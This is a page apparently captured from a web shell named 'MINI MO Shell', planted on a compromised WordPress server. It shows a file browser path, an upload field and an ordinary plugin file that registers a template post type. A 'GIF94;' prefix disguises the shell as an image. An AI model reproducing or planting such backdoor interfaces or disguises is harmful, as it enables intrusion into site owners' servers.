GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/themeless/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/themeless/template.cpt.php

<?php

namespace Breakdance\Themeless;

/**
 * @return void
 */
function register_template_post_type()
{

    \register_post_type(
        BREAKDANCE_TEMPLATE_POST_TYPE,
        array_merge(
            [
                'labels' => [
                    'name' => esc_html__('Templates', 'breakdance'),
                    'singular_name' => esc_html__('Template', 'breakdance'),
                ],
            ],
            getTemplateCptsSharedArgs()
        )
    );

    \Breakdance\Util\disable_publishing_options_and_attributes_metabox_and_force_status_to_publish(BREAKDANCE_TEMPLATE_POST_TYPE);
}

OHA YOOO - Tarih: 2026-08-03 23:11:38